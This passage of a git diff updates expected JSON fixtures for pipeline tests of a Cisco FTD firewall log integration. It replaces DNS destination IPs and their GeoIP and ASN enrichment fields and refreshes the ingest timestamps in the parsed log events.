"organization": { - "name": "Amazon.com, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "205.251.196.144", + "address": "81.2.69.144", "port": 53, "bytes": 75, - "ip": "205.251.196.144", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1552,7 +1582,7 @@ ], "ip": [ "10.0.1.20", - "205.251.196.144" + "81.2.69.144" ] }, "host": { @@ -1561,8 +1591,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351809886Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 205.251.196.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused", + "ingested": "2021-12-09T13:32:56.096958500Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1592,7 +1622,7 @@ "dns_query": "refusedthis.com", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "205.251.196.144", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -1626,24 +1656,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 313, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 4 }, "dns": { @@ -1694,7 +1727,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -1703,8 +1736,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351812056Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure", + "ingested": "2021-12-09T13:32:56.096965100Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1736,7 +1769,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "39541", "src_ip": "10.0.1.20", @@ -1774,23 +1807,26 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 19281, + "number": 20712, "organization": { - "name": "Quad9" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "9.9.9.9", + "address": "81.2.69.144", "port": 53, "bytes": 180, - "ip": "9.9.9.9", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1838,7 +1874,7 @@ ], "ip": [ "10.0.1.20", - "9.9.9.9" + "81.2.69.144" ] }, "host": { @@ -1847,8 +1883,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351813895Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", + "ingested": "2021-12-09T13:32:56.096971200Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -1878,7 +1914,7 @@ "dns_query": "laskdfjlaksdf.elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "9.9.9.9", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -1921,23 +1957,26 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 19281, + "number": 20712, "organization": { - "name": "Quad9" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "9.9.9.9", + "address": "81.2.69.144", "port": 53, "bytes": 108, - "ip": "9.9.9.9", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -1985,7 +2024,7 @@ ], "ip": [ "10.0.1.20", - "9.9.9.9" + "81.2.69.144" ] }, "host": { @@ -1994,8 +2033,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351815726Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", + "ingested": "2021-12-09T13:32:56.096977300Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2025,7 +2064,7 @@ "dns_query": "ns-1168.awsdns-18.org", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "9.9.9.9", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -2067,23 +2106,26 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 19281, + "number": 20712, "organization": { - "name": "Quad9" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "9.9.9.9", + "address": "81.2.69.144", "port": 53, "bytes": 162, - "ip": "9.9.9.9", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2131,7 +2173,7 @@ ], "ip": [ "10.0.1.20", - "9.9.9.9" + "81.2.69.144" ] }, "host": { @@ -2140,8 +2182,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351817513Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", + "ingested": "2021-12-09T13:32:56.096983500Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2171,7 +2213,7 @@ "dns_query": "_http._tcp.security.ubuntu.com", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "9.9.9.9", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -2213,24 +2255,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2278,7 +2323,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -2287,8 +2332,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351819338Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", + "ingested": "2021-12-09T13:32:56.096989700Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2319,7 +2364,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -2361,24 +2406,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2426,7 +2474,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -2435,8 +2483,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351821378Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", + "ingested": "2021-12-09T13:32:56.096996Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2466,7 +2514,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -2507,24 +2555,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2572,7 +2623,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -2581,8 +2632,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351823157Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", + "ingested": "2021-12-09T13:32:56.097002100Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2612,7 +2663,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -2653,24 +2704,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2718,7 +2772,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -2727,8 +2781,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351824930Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", + "ingested": "2021-12-09T13:32:56.097006900Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2758,7 +2812,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", @@ -2798,24 +2852,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 131, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -2863,7 +2920,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -2872,8 +2929,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351826720Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", + "ingested": "2021-12-09T13:32:56.097011800Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -2906,7 +2963,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "46093", "src_ip": "10.0.1.20", @@ -2943,24 +3000,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -3008,7 +3068,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { @@ -3017,8 +3077,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:44.351828609Z", - "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", + "ingested": "2021-12-09T13:32:56.097017800Z", + "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", "start": "2019-08-26T23:11:03.000Z", @@ -3049,7 +3109,7 @@ "dns_query": "elastic.co", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json index 21609e8be8e..5271161c37c 